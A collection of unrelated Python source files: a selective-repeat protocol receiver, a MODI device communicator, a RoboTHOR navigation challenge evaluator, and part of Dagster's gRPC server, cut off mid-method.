self.data_queue_cv = Condition()
self.done_receiving = False
self.waiting_to_close = False
self.lock = Lock()
self.loss_prob = loss_prob
self.closing_cv = Condition()
def start_data_waiter(self):
t = Thread(target=self.wait_for_data)
t.daemon = True
t.start()
def wait_for_data(self):
while not self.done_receiving:
packet, sender_address = self.udt_receiver.receive()
logger.info(f'received {packet.data} from {sender_address}')
udt_sender = CorruptingUDTSender(LossyUDTSender(UDTSender.from_udt_receiver(self.udt_receiver,*sender_address)
, self.loss_prob),0.5)
udt_sender.send_ack(packet.seq_number)
logger.info(f'sent an Ack with seq number {packet.seq_number}'
f'to {sender_address}')
self.adjust_window(packet)
def adjust_window(self, packet):
if self.is_in_window(packet.seq_number):
try:
self.current_window[self.get_window_idx(packet.seq_number)] = packet
except IndexError:
wind = [x.data if x is not None else None for x in self.current_window]
logger.error(f'{self.get_window_idx(packet.seq_number)} is out of {wind}|'
f' {self.is_in_window(packet.seq_number)} | base={self.base_seq_num}' )
else:
logger.error('error tany')
else:
logger.debug(f'got {packet.seq_number} out of window')
logger.debug(f'(sr_receiver) : window before adjusting '
f'= {[pkt.data if pkt is not None else None for pkt in self.current_window]} '
f'| base={self.base_seq_num} ({self.cnt})')
shifts = 0
for i, pkt in enumerate(self.current_window):
if pkt is None:
break
with self.data_queue_cv:
self.data_queue.append(pkt)
self.data_queue_cv.notify()
self.current_window[i] = None
shifts += 1
self.current_window.rotate(-shifts)
self.base_seq_num = (self.base_seq_num + shifts) % self.max_seq_num
logger.debug(
f'window after adjusting = {[pkt.data if pkt is not None else None for pkt in self.current_window]} '
f'| base={self.base_seq_num} ({self.cnt})')
self.cnt+=1
with self.data_queue_cv:
self.data_queue_cv.notify()
def get_packet(self):
with self.data_queue_cv:
self.data_queue_cv.wait_for(lambda : len(self.data_queue) > 0)
pkt = self.data_queue.popleft()
logger.info(f'delivering packet with data {pkt.data} to upper layer')
return pkt
@classmethod
def from_sender(cls, sr_sender, window_size=4, max_seq_num=-1, loss_prob=0):
sr_receiver = cls(window_size=window_size, max_seq_num=max_seq_num,loss_prob=loss_prob)
sr_receiver.udt_receiver = InterruptableUDTReceiver(UDTReceiver.from_udt_sender(sr_sender.udt_sender))
return sr_receiver
def listen(self, port):
"""
This sets up the receiver to start listening for incoming connections
on the port passed in as a parameter.
:param port:
"""
self.udt_listening_receiver.bind(port)
self.is_listening = True
def accept(self, callback, **sender_args):
def extended_callback(init_packet, sr_sender):
time.sleep(1)
callback(init_packet, sr_sender)
if not self.is_listening:
raise TypeError('non listening receiver cannot accept connections')
init_packet, sender_address = self.udt_listening_receiver.receive()
logger.info( f'(listener) : received {init_packet.data} from {sender_address}')
udt_sender = UDTSender(*sender_address)
udt_sender.send_ack(init_packet.seq_number)
self.adjust_window(init_packet)
client_thread = Thread(target=extended_callback, args=(init_packet, SelectiveRepeatSender(*sender_address, **sender_args)))
client_thread.daemon = True
client_thread.start()
return client_thread
def close(self):
with self.closing_cv:
while len(self.data_queue) > 0:
self.closing_cv.wait()
time.sleep(5) # wait for half a millisecond in case this is just a pause due to delays
logger.debug('woke up')
if len(self.data_queue) > 0:
self.close()
self.done_receiving = True
logger.debug('closing client')
def is_in_window(self, seq_num):
return seq_num in [i % self.max_seq_num for i in range(self.base_seq_num, self.base_seq_num + self.window_size)]
def get_window_idx(self, seq_num):
seq_num = seq_num if seq_num >= self.base_seq_num else seq_num + self.max_seq_num
return seq_num - self.base_seq_num
|
_communicator.py
|
import threading as th
import multiprocessing as mp
from modi._communicator_task import CommunicatorTask
from modi._ser_task import SerTask
from modi._can_task import CanTask
from modi._spp_task import SppTask
class Communicator(mp.Process):
def __init__(self, recv_q, send_q, conn_mode, module_uuid):
super().__init__()
params = [recv_q, send_q]
if conn_mode.startswith("b"):
params.append(module_uuid)
self.__task = self.__init_task(conn_mode)(*params)
self.__delay = 0.05 if isinstance(self.__task, SppTask) else 0.001
def __init_task(self, conn_mode):
if conn_mode.startswith("b"):
return SppTask
return CanTask if self.__is_modi_pi() else SerTask
@staticmethod
def __is_modi_pi():
return CommunicatorTask.is_on_pi() and \
not CommunicatorTask.is_network_module_connected()
def run(self):
self.__task.open_conn()
read_thread = th.Thread(
target=self.__task.run_read_data, args=(self.__delay,)
)
read_thread.daemon = True
read_thread.start()
write_thread = th.Thread(
target=self.__task.run_write_data, args=(self.__delay,)
)
write_thread.daemon = True
write_thread.start()
read_thread.join()
write_thread.join()
|
challenge.py
|
from typing import Dict, Any
import os
import sys
import glob
import json
import yaml
import time
import gzip
import random
import logging
import multiprocessing as mp
import queue
import threading
import ai2thor.controller
import ai2thor.util.metrics
from robothor_challenge.startx import startx
logger = logging.getLogger(__name__)
ch = logging.StreamHandler(sys.stdout)
ch.flush = sys.stdout.flush
ch.setLevel(logging.INFO)
formatter = logging.Formatter("%(asctime)s [%(levelname)s] %(name)s - %(message)s")
ch.setFormatter(formatter)
logger.addHandler(ch)
ALLOWED_ACTIONS = ["MoveAhead", "RotateRight", "RotateLeft", "LookUp", "LookDown", "Stop"]
def get_object_by_type(event_objects, object_type):
for obj in event_objects:
if obj['objectId'].split("|")[0] == object_type:
return obj
return None
class RobothorChallenge:
def __init__(self, cfg_file, agent_class, agent_kwargs, render_depth=False):
self.agent_class = agent_class
self.agent_kwargs = agent_kwargs
self.config = self.load_config(cfg_file, render_depth)
self.setup_env()
self.controller_kwargs = {
"commit_id": self.config["thor_build_id"],
"width": self.config["width"],
"height": self.config["height"],
**self.config["initialize"]
}
self.current_scene = None
self.reachable_positions_per_scene = {}
@staticmethod
def load_config(cfg_file, render_depth):
logger.info("Loading configuration from: %s" % cfg_file)
with open(cfg_file, "r") as f:
config = yaml.safe_load(f.read())
if render_depth:
config["initialize"]["renderDepthImage"] = True
return config
@staticmethod
def setup_env():
if "DISPLAY" not in os.environ:
xthread = threading.Thread(target=startx)
xthread.daemon = True
xthread.start()
import time
# XXX change this to use xdpyinfo
time.sleep(4)
@staticmethod
def load_split(dataset_dir, split):
split_paths = os.path.join(dataset_dir, split, "episodes", "*.json.gz")
split_paths = sorted(glob.glob(split_paths))
episode_list = []
dataset = {}
for split_path in split_paths:
logger.info("Loading: {path}".format(path=split_path))
with gzip.GzipFile(split_path, "r") as f:
episodes = json.loads(f.read().decode("utf-8"))
# Build a dictionary of the dataset indexed by scene, object_type
curr_scene = None
curr_object = None
points = []
scene_points = {}
for data_point in episodes:
if curr_object != data_point["object_type"]:
scene_points[curr_object] = points
curr_object = data_point["object_type"]
points = []
if curr_scene != data_point["scene"]:
dataset[curr_scene] = scene_points
curr_scene = data_point["scene"]
scene_points = {}
points.append(data_point)
episode_list += episodes
return episode_list, dataset
@staticmethod
def inference_worker(
worker_ind: int,
in_queue: mp.Queue,
out_queue: mp.Queue,
agent_class: Any,
agent_kwargs: Dict[str, Any],
controller_kwargs: Dict[str, Any],
max_steps: int,
test: bool
):
agent = agent_class(**agent_kwargs)
controller = ai2thor.controller.Controller(**controller_kwargs)
while True:
try:
e = in_queue.get(timeout=1)
except queue.Empty:
break
logger.info("Task Start id:{id} scene:{scene} target_object:{object_type} initial_position:{initial_position} rotation:{initial_orientation}".format(**e))
controller.initialization_parameters["robothorChallengeEpisodeId"] = e["id"]
print(e["scene"])
controller.reset(e["scene"])
teleport_action = {
"action": "TeleportFull",
**e["initial_position"],
"rotation": {"x": 0, "y": e["initial_orientation"], "z": 0},
"horizon": e["initial_horizon"],
"standing": True
}
controller.step(action=teleport_action)
total_steps = 0
agent.reset()
episode_metrics = {
"trajectory" : [{
**e["initial_position"],
"rotation" : float(e["initial_orientation"]),
"horizon" : e["initial_horizon"]
}],
"actions_taken" : []
}
stopped = False
while total_steps < max_steps and stopped is False:
total_steps += 1
event = controller.last_event
event.metadata.clear()
action = agent.act({
"object_goal" : e["object_type"],
"depth" : event.depth_frame,
"rgb" : event.frame
})
if action not in ALLOWED_ACTIONS:
raise ValueError("Invalid action: {action}".format(action=action))
logger.info("Agent action: {action}".format(action=action))
event = controller.step(action=action)
episode_metrics["trajectory"].append({
**event.metadata["agent"]["position"],
"rotation": event.metadata["agent"]["rotation"]["y"],
"horizon": event.metadata["agent"]["cameraHorizon"]
})
episode_metrics["actions_taken"].append({
"action": action,
"success": event.metadata["lastActionSuccess"]
})
stopped = action == "Stop"
if not test:
target_obj = get_object_by_type(event.metadata["objects"], e["object_type"])
assert target_obj is not None
target_visible = target_obj["visible"]
episode_metrics["success"] = stopped and target_visible
if not test:
episode_result = {
"path": episode_metrics["trajectory"],
"shortest_path": e["shortest_path"],
"success": episode_metrics["success"]
}
else:
episode_result = None
out_queue.put((e["id"], episode_metrics, episode_result))
controller.stop()
print(f"Worker {worker_ind} Finished.")
def inference(self, episodes, nprocesses=1, test=False):
send_queue = mp.Queue()
receive_queue = mp.Queue()
expected_count = len(episodes)
for e in episodes:
send_queue.put(e)
processes = []
for worker_ind in range(nprocesses):
p = mp.Process(
target=self.inference_worker,
kwargs=dict(
worker_ind=worker_ind,
in_queue=send_queue,
out_queue=receive_queue,
agent_class=self.agent_class,
agent_kwargs=self.agent_kwargs,
controller_kwargs=self.controller_kwargs,
max_steps=self.config["max_steps"],
test=test
),
)
p.start()
processes.append(p)
time.sleep(0.2)
metrics = {"episodes" : {}}
episode_results = []
while len(metrics["episodes"]) < expected_count:
try:
ep_id, episode_metrics, episode_result = receive_queue.get(timeout=10)
metrics["episodes"][ep_id] = episode_metrics
if not test:
episode_results.append(episode_result)
except TimeoutError:
print("Went 10 seconds without a new episode result.")
if all(not p.is_alive() for p in processes):
try:
ep_id, episode_metrics, episode_result = receive_queue.get(timeout=1)
metrics["episodes"][ep_id] = episode_metrics
if not test:
episode_results.append(episode_result)
except TimeoutError:
raise RuntimeError("All processes dead but nothing in queue!")
for p in processes:
p.join(timeout=2)
metrics["ep_len"] = sum([len(em["trajectory"]) for em in metrics["episodes"].values()]) / len(metrics["episodes"])
if not test:
metrics["success"] = sum([r["success"] for r in episode_results]) / len(episode_results)
metrics["spl"] = ai2thor.util.metrics.compute_spl(episode_results)
if not test:
logger.info("Total Episodes: {episode_count} Success:{success} SPL:{spl} Episode Length:{ep_len}".format(episode_count=len(episodes), success=metrics["success"], spl=metrics["spl"], ep_len=metrics["ep_len"]))
else:
logger.info("Total Episodes: {episode_count} Episode Length:{ep_len}".format(episode_count=len(episodes), ep_len=metrics["ep_len"]))
return metrics
def _change_scene(self, scene):
if self.current_scene != scene:
self.current_scene = scene
self.controller.reset(scene)
logger.info("Changed to scene: '{scene}'".format(scene=scene))
def move_to_point(self, datapoint):
self._change_scene(datapoint["scene"])
logger.info("Moving to position: {p}, y-rotation: {rot}, horizon: {hor}".format(
p=datapoint["initial_position"],
rot=datapoint["initial_orientation"],
hor=datapoint["initial_horizon"]
))
return self.controller.step(
action="TeleportFull",
x=datapoint["initial_position"]["x"],
y=datapoint["initial_position"]["y"],
z=datapoint["initial_position"]["z"],
rotation={"x" : 0, "y" : datapoint["initial_orientation"], "z" : 0},
horizon=datapoint["initial_horizon"],
standing=True
)
def move_to_random_dataset_point(self, dataset, scene, object_type):
if scene in dataset:
if object_type in dataset[scene]:
datapoint = random.choice(dataset[scene][object_type])
return self.move_to_point(datapoint)
else:
logger.warning(
"No object of type: '{object_type}' for scene: '{scene}', in dataset".format(
object_type=object_type,
scene=scene
)
)
return None
else:
logger.warning("No scene: '{scene}' in dataset".format(scene=scene))
return None
def move_to_random_point(self, scene, y_rotation=0, horizon=0):
if "test" in scene:
raise RuntimeError(
"Moving to random points is not posible in test scenes"
)
reachable_positions = self._get_reachable_positions_in_scene(scene)
p = random.choice(reachable_positions)
return self.move_to_point({
"initial_position": p,
"initial_orientation": y_rotation,
"initial_horizon": horizon,
"scene" : scene
})
def _get_reachable_positions_in_scene(self, scene):
self._change_scene(scene)
if scene not in self.reachable_positions_per_scene:
event_reachable = self.controller.step({
"action" : "GetReachablePositions",
"gridSize" : self.config["initialize"]["gridSize"]
})
self.reachable_positions_per_scene[scene] = event_reachable.metadata["actionReturn"]
return self.reachable_positions_per_scene[scene]
|
server.py
|
import math
import os
import queue
import sys
import threading
import time
import uuid
from collections import namedtuple
from concurrent.futures import ThreadPoolExecutor
from threading import Event as ThreadingEventType
from time import sleep
import grpc
from dagster import check, seven
from dagster.core.code_pointer import CodePointer
from dagster.core.definitions.reconstructable import (
ReconstructableRepository,
repository_def_from_target_def,
)
from dagster.core.host_representation.external_data import external_repository_data_from_def
from dagster.core.host_representation.origin import ExternalPipelineOrigin, ExternalRepositoryOrigin
from dagster.core.instance import DagsterInstance
from dagster.core.types.loadable_target_origin import LoadableTargetOrigin
from dagster.serdes import (
deserialize_json_to_dagster_namedtuple,
serialize_dagster_namedtuple,
whitelist_for_serdes,
)
from dagster.serdes.ipc import IPCErrorMessage, ipc_write_stream, open_ipc_subprocess
from dagster.seven import multiprocessing
from dagster.utils import find_free_port, safe_tempfile_path_unmanaged
from dagster.utils.error import SerializableErrorInfo, serializable_error_info_from_exc_info
from grpc_health.v1 import health, health_pb2, health_pb2_grpc
from .__generated__ import api_pb2
from .__generated__.api_pb2_grpc import DagsterApiServicer, add_DagsterApiServicer_to_server
from .impl import (
RunInSubprocessComplete,
StartRunInSubprocessSuccessful,
get_external_execution_plan_snapshot,
get_external_pipeline_subset_result,
get_external_schedule_execution,
get_external_sensor_execution,
get_notebook_data,
get_partition_config,
get_partition_names,
get_partition_set_execution_param_data,
get_partition_tags,
start_run_in_subprocess,
)
from .types import (
CanCancelExecutionRequest,
CanCancelExecutionResult,
CancelExecutionRequest,
CancelExecutionResult,
ExecuteExternalPipelineArgs,
ExecutionPlanSnapshotArgs,
ExternalScheduleExecutionArgs,
GetCurrentImageResult,
ListRepositoriesResponse,
LoadableRepositorySymbol,
PartitionArgs,
PartitionNamesArgs,
PartitionSetExecutionParamArgs,
PipelineSubsetSnapshotArgs,
SensorExecutionArgs,
ShutdownServerResult,
StartRunResult,
)
from .utils import get_loadable_targets
EVENT_QUEUE_POLL_INTERVAL = 0.1
CLEANUP_TICK = 0.5
STREAMING_CHUNK_SIZE = 4000000
class CouldNotBindGrpcServerToAddress(Exception):
pass
class RepositorySymbolsAndCodePointers:
def __init__(self, loadable_target_origin):
self._loadable_target_origin = loadable_target_origin
self._loadable_repository_symbols = None
self._code_pointers_by_repo_name = None
def load(self):
self._loadable_repository_symbols = load_loadable_repository_symbols(
self._loadable_target_origin
)
self._code_pointers_by_repo_name = build_code_pointers_by_repo_name(
self._loadable_target_origin, self._loadable_repository_symbols
)
@property
def loadable_repository_symbols(self):
return self._loadable_repository_symbols
@property
def code_pointers_by_repo_name(self):
return self._code_pointers_by_repo_name
def load_loadable_repository_symbols(loadable_target_origin):
if loadable_target_origin:
loadable_targets = get_loadable_targets(
loadable_target_origin.python_file,
loadable_target_origin.module_name,
loadable_target_origin.package_name,
loadable_target_origin.working_directory,
loadable_target_origin.attribute,
)
return [
LoadableRepositorySymbol(
attribute=loadable_target.attribute,
repository_name=repository_def_from_target_def(
loadable_target.target_definition
).name,
)
for loadable_target in loadable_targets
]
else:
return []
def build_code_pointers_by_repo_name(loadable_target_origin, loadable_repository_symbols):
repository_code_pointer_dict = {}
for loadable_repository_symbol in loadable_repository_symbols:
if loadable_target_origin.python_file:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_file(
loadable_target_origin.python_file,
loadable_repository_symbol.attribute,
loadable_target_origin.working_directory,
)
elif loadable_target_origin.package_name:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_python_package(
loadable_target_origin.package_name,
loadable_repository_symbol.attribute,
)
else:
repository_code_pointer_dict[
loadable_repository_symbol.repository_name
] = CodePointer.from_module(
loadable_target_origin.module_name,
loadable_repository_symbol.attribute,
)
return repository_code_pointer_dict
class DagsterApiServer(DagsterApiServicer):
# The loadable_target_origin is currently Noneable to support instaniating a server.
# This helps us test the ping methods, and incrementally migrate each method to
# the target passed in here instead of passing in a target in the argument.
def __init__(
self,
server_termination_event,
loadable_target_origin=None,
heartbeat=False,
heartbeat_timeout=30,
lazy_load_user_code=False,
fixed_server_id=None,
):
super(DagsterApiServer, self).__init__()
check.bool_param(heartbeat, "heartbeat")
check.int_param(heartbeat_timeout, "heartbeat_timeout")
check.invariant(heartbeat_timeout > 0, "heartbeat_timeout must be greater than 0")
self._server_termination_event = check.inst_param(
server_termination_event, "server_termination_event", ThreadingEventType
)
self._loadable_target_origin = check.opt_inst_param(
loadable_target_origin, "loadable_target_origin", LoadableTargetOrigin
)
# Each server is initialized with a unique UUID. This UUID is used by clients to track when
# servers are replaced and is used for cache invalidation and reloading.
self._server_id = check.opt_str_param(fixed_server_id, "fixed_server_id", str(uuid.uuid4()))
# Client tells the server to shutdown by calling ShutdownServer (or by failing to send a
# hearbeat, at which point this event is set. The cleanup thread will then set the server
# termination event once all current executions have finished, which will stop the server)
self._shutdown_once_executions_finish_event = threading.Event()
# Dict[str, (multiprocessing.Process, DagsterInstance)]
self._executions = {}
# Dict[str, multiprocessing.Event]
self._termination_events = {}
self._termination_times = {}
self._execution_lock = threading.Lock()
self._serializable_load_error = None
self._repository_symbols_and_code_pointers = RepositorySymbolsAndCodePointers(
loadable_target_origin
)
try:
self._repository_symbols_and_code_pointers.load()
except Exception: # pylint:disable=broad-except
if not lazy_load_user_code:
raise
self._serializable_load_error = serializable_error_info_from_exc_info(sys.exc_info())
self.__last_heartbeat_time = time.time()
if heartbeat:
self.__heartbeat_thread = threading.Thread(
target=self._heartbeat_thread,
args=(heartbeat_timeout,),
name="grpc-server-heartbeat",
)
self.__heartbeat_thread.daemon = True
self.__heartbeat_thread.start()
else:
self.__heartbeat_thread = None
self.__cleanup_thread = threading.Thread(
target=self._cleanup_thread, args=(), name="grpc-server-cleanup"
)
self.__cleanup_thread.daemon = True
self.__cleanup_thread.start()
def cleanup(self):
if self.__heartbeat_thread:
self.__heartbeat_thread.join()
self.__cleanup_thread.join()
def _heartbeat_thread(self, heartbeat_timeout):
while True:
self._shutdown_once_executions_finish_event.wait(heartbeat_timeout)
if self._shutdown_once_executions_finish_event.is_set():
break
if self.__last_heartbeat_time < time.time() - heartbeat_timeout:
self._shutdown_once_executions_finish_event.set()
def _cleanup_thread(self):
while True:
self._server_termination_event.wait(CLEANUP_TICK)
if self._server_termination_event.is_set():
break
self._check_for_orphaned_runs()
def _check_for_orphaned_runs(self):
with self._execution_lock:
runs_to_clear = []
for run_id, (process, instance_ref) in self._executions.items():
if not process.is_alive():
with DagsterInstance.from_ref(instance_ref) as instance:
runs_to_clear.append(run_id)
run = instance.get_run_by_id(run_id)
if not run or run.is_finished:
continue
# the process died in an unexpected manner. inform the system
message = (
f"Pipeline execution process for {run.run_id} unexpectedly "
f"exited with exit code {process.exitcode}."
)
instance.report_engine_event(message, run, cls=self.__class__)
instance.report_run_failed(run)
for run_id in runs_to_clear:
self._clear_run(run_id)
# Once there are no more running executions after we have received a request to
# shut down, terminate the server
if self._shutdown_once_executions_finish_event.is_set():
if len(self._executions) == 0:
self._server_termination_event.set()
# Assumes execution lock is being held
def _clear_run(self, run_id):
del self._executions[run_id]
del self._termination_events[run_id]
if run_id in self._termination_times:
del self._termination_times[run_id]
def _recon_repository_from_origin(self, external_repository_origin):
check.inst_param(
external_repository_origin,
"external_repository_origin",
ExternalRepositoryOrigin,
)
return ReconstructableRepository(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name[
external_repository_origin.repository_name
],
self._get_current_image(),
)
def _recon_pipeline_from_origin(self, external_pipeline_origin):
check.inst_param(
external_pipeline_origin, "external_pipeline_origin", ExternalPipelineOrigin
)
recon_repo = self._recon_repository_from_origin(
external_pipeline_origin.external_repository_origin
)
return recon_repo.get_reconstructable_pipeline(external_pipeline_origin.pipeline_name)
def Ping(self, request, _context):
echo = request.echo
return api_pb2.PingReply(echo=echo)
def StreamingPing(self, request, _context):
sequence_length = request.sequence_length
echo = request.echo
for sequence_number in range(sequence_length):
yield api_pb2.StreamingPingEvent(sequence_number=sequence_number, echo=echo)
def Heartbeat(self, request, _context):
self.__last_heartbeat_time = time.time()
echo = request.echo
return api_pb2.PingReply(echo=echo)
def GetServerId(self, _request, _context):
return api_pb2.GetServerIdReply(server_id=self._server_id)
def ExecutionPlanSnapshot(self, request, _context):
execution_plan_args = deserialize_json_to_dagster_namedtuple(
request.serialized_execution_plan_snapshot_args
)
check.inst_param(execution_plan_args, "execution_plan_args", ExecutionPlanSnapshotArgs)
recon_pipeline = self._recon_pipeline_from_origin(execution_plan_args.pipeline_origin)
execution_plan_snapshot_or_error = get_external_execution_plan_snapshot(
recon_pipeline, execution_plan_args
)
return api_pb2.ExecutionPlanSnapshotReply(
serialized_execution_plan_snapshot=serialize_dagster_namedtuple(
execution_plan_snapshot_or_error
)
)
def ListRepositories(self, request, _context):
if self._serializable_load_error:
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(
self._serializable_load_error
)
)
response = ListRepositoriesResponse(
self._repository_symbols_and_code_pointers.loadable_repository_symbols,
executable_path=self._loadable_target_origin.executable_path
if self._loadable_target_origin
else None,
repository_code_pointer_dict=(
self._repository_symbols_and_code_pointers.code_pointers_by_repo_name
),
)
return api_pb2.ListRepositoriesReply(
serialized_list_repositories_response_or_error=serialize_dagster_namedtuple(response)
)
def ExternalPartitionNames(self, request, _context):
partition_names_args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_names_args
)
check.inst_param(partition_names_args, "partition_names_args", PartitionNamesArgs)
recon_repo = self._recon_repository_from_origin(partition_names_args.repository_origin)
return api_pb2.ExternalPartitionNamesReply(
serialized_external_partition_names_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_names(
recon_repo,
partition_names_args.partition_set_name,
)
)
)
def ExternalNotebookData(self, request, _context):
notebook_path = request.notebook_path
check.str_param(notebook_path, "notebook_path")
return api_pb2.ExternalNotebookDataReply(content=get_notebook_data(notebook_path))
def ExternalPartitionSetExecutionParams(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_partition_set_execution_param_args
)
check.inst_param(
args,
"args",
PartitionSetExecutionParamArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_data = serialize_dagster_namedtuple(
get_partition_set_execution_param_data(
recon_repo=recon_repo,
partition_set_name=args.partition_set_name,
partition_names=args.partition_names,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_data)
def ExternalPartitionConfig(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(args, "args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
return api_pb2.ExternalPartitionConfigReply(
serialized_external_partition_config_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_config(recon_repo, args.partition_set_name, args.partition_name)
)
)
def ExternalPartitionTags(self, request, _context):
partition_args = deserialize_json_to_dagster_namedtuple(request.serialized_partition_args)
check.inst_param(partition_args, "partition_args", PartitionArgs)
recon_repo = self._recon_repository_from_origin(partition_args.repository_origin)
return api_pb2.ExternalPartitionTagsReply(
serialized_external_partition_tags_or_external_partition_execution_error=serialize_dagster_namedtuple(
get_partition_tags(
recon_repo, partition_args.partition_set_name, partition_args.partition_name
)
)
)
def ExternalPipelineSubsetSnapshot(self, request, _context):
pipeline_subset_snapshot_args = deserialize_json_to_dagster_namedtuple(
request.serialized_pipeline_subset_snapshot_args
)
check.inst_param(
pipeline_subset_snapshot_args,
"pipeline_subset_snapshot_args",
PipelineSubsetSnapshotArgs,
)
return api_pb2.ExternalPipelineSubsetSnapshotReply(
serialized_external_pipeline_subset_result=serialize_dagster_namedtuple(
get_external_pipeline_subset_result(
self._recon_pipeline_from_origin(pipeline_subset_snapshot_args.pipeline_origin),
pipeline_subset_snapshot_args.solid_selection,
)
)
)
def _get_serialized_external_repository_data(self, request):
repository_origin = deserialize_json_to_dagster_namedtuple(
request.serialized_repository_python_origin
)
check.inst_param(repository_origin, "repository_origin", ExternalRepositoryOrigin)
recon_repo = self._recon_repository_from_origin(repository_origin)
return serialize_dagster_namedtuple(
external_repository_data_from_def(recon_repo.get_definition())
)
def ExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
return api_pb2.ExternalRepositoryReply(
serialized_external_repository_data=serialized_external_repository_data,
)
def StreamingExternalRepository(self, request, _context):
serialized_external_repository_data = self._get_serialized_external_repository_data(request)
num_chunks = int(
math.ceil(float(len(serialized_external_repository_data)) / STREAMING_CHUNK_SIZE)
)
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_external_repository_data),
)
yield api_pb2.StreamingExternalRepositoryEvent(
sequence_number=i,
serialized_external_repository_chunk=serialized_external_repository_data[
start_index:end_index
],
)
def _split_serialized_data_into_chunk_events(self, serialized_data):
num_chunks = int(math.ceil(float(len(serialized_data)) / STREAMING_CHUNK_SIZE))
for i in range(num_chunks):
start_index = i * STREAMING_CHUNK_SIZE
end_index = min(
(i + 1) * STREAMING_CHUNK_SIZE,
len(serialized_data),
)
yield api_pb2.StreamingChunkEvent(
sequence_number=i,
serialized_chunk=serialized_data[start_index:end_index],
)
def ExternalScheduleExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_schedule_execution_args
)
check.inst_param(
args,
"args",
ExternalScheduleExecutionArgs,
)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_schedule_data = serialize_dagster_namedtuple(
get_external_schedule_execution(
recon_repo,
args.instance_ref,
args.schedule_name,
args.scheduled_execution_timestamp,
args.scheduled_execution_timezone,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_schedule_data)
def ExternalSensorExecution(self, request, _context):
args = deserialize_json_to_dagster_namedtuple(
request.serialized_external_sensor_execution_args
)
check.inst_param(args, "args", SensorExecutionArgs)
recon_repo = self._recon_repository_from_origin(args.repository_origin)
serialized_sensor_data = serialize_dagster_namedtuple(
get_external_sensor_execution(
recon_repo,
args.instance_ref,
args.sensor_name,
args.last_completion_time,
args.last_run_key,
args.cursor,
)
)
yield from self._split_serialized_data_into_chunk_events(serialized_sensor_data)
def ShutdownServer(self, request, _context):
try:
self._shutdown_once_executions_finish_event.set()
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(success=True, serializable_error_info=None)
)
)
except: # pylint: disable=bare-except
return api_pb2.ShutdownServerReply(
serialized_shutdown_server_result=serialize_dagster_namedtuple(
ShutdownServerResult(
success=False,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
def CancelExecution(self, request, _context):
success = False
message = None
serializable_error_info = None
try:
cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_cancel_execution_request),
CancelExecutionRequest,
)
with self._execution_lock:
if cancel_execution_request.run_id in self._executions:
self._termination_events[cancel_execution_request.run_id].set()
self._termination_times[cancel_execution_request.run_id] = time.time()
success = True
except: # pylint: disable=bare-except
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
return api_pb2.CancelExecutionReply(
serialized_cancel_execution_result=serialize_dagster_namedtuple(
CancelExecutionResult(
success=success,
message=message,
serializable_error_info=serializable_error_info,
)
)
)
def CanCancelExecution(self, request, _context):
can_cancel_execution_request = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_can_cancel_execution_request),
CanCancelExecutionRequest,
)
with self._execution_lock:
run_id = can_cancel_execution_request.run_id
can_cancel = (
run_id in self._executions and not self._termination_events[run_id].is_set()
)
return api_pb2.CanCancelExecutionReply(
serialized_can_cancel_execution_result=serialize_dagster_namedtuple(
CanCancelExecutionResult(can_cancel=can_cancel)
)
)
def StartRun(self, request, _context):
if self._shutdown_once_executions_finish_event.is_set():
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message="Tried to start a run on a server after telling it to shut down",
serializable_error_info=None,
)
)
)
try:
execute_run_args = check.inst(
deserialize_json_to_dagster_namedtuple(request.serialized_execute_run_args),
ExecuteExternalPipelineArgs,
)
run_id = execute_run_args.pipeline_run_id
recon_pipeline = self._recon_pipeline_from_origin(execute_run_args.pipeline_origin)
except: # pylint: disable=bare-except
return api_pb2.StartRunReply(
serialized_start_run_result=serialize_dagster_namedtuple(
StartRunResult(
success=False,
message=None,
serializable_error_info=serializable_error_info_from_exc_info(
sys.exc_info()
),
)
)
)
event_queue = multiprocessing.Queue()
termination_event = multiprocessing.Event()
execution_process = multiprocessing.Process(
target=start_run_in_subprocess,
args=[
request.serialized_execute_run_args,
recon_pipeline,
event_queue,
termination_event,
],
)
with self._execution_lock:
execution_process.start()
self._executions[run_id] = (
execution_process,
execute_run_args.instance_ref,
)
self._termination_events[run_id] = termination_event
success = None
message = None
serializable_error_info = None
while success is None:
sleep(EVENT_QUEUE_POLL_INTERVAL)
# We use `get_nowait()` instead of `get()` so that we can handle the case where the
# execution process has died unexpectedly -- `get()` would hang forever in that case
try:
dagster_event_or_ipc_error_message_or_done = event_queue.get_nowait()
except queue.Empty:
if not execution_process.is_alive():
# subprocess died unexpectedly
success = False
message = (
"GRPC server: Subprocess for {run_id} terminated unexpectedly with "
"exit code {exit_code}".format(
run_id=run_id,
exit_code=execution_process.exitcode,
)
)
serializable_error_info = serializable_error_info_from_exc_info(sys.exc_info())
else:
if isinstance(
dagster_event_or_ipc_error_message_or_done, StartRunInSubprocessSuccessful
):
success = True
elif isinstance(
dagster_event_or_ipc_error_message_or_done, RunInSubprocessComplete
):
continue
if isinstance(dagster_event_or_ipc_error_message_or_done, IPCErrorMessage):
success = False
message = dagster_event_or_ipc_error_message_or_done.message
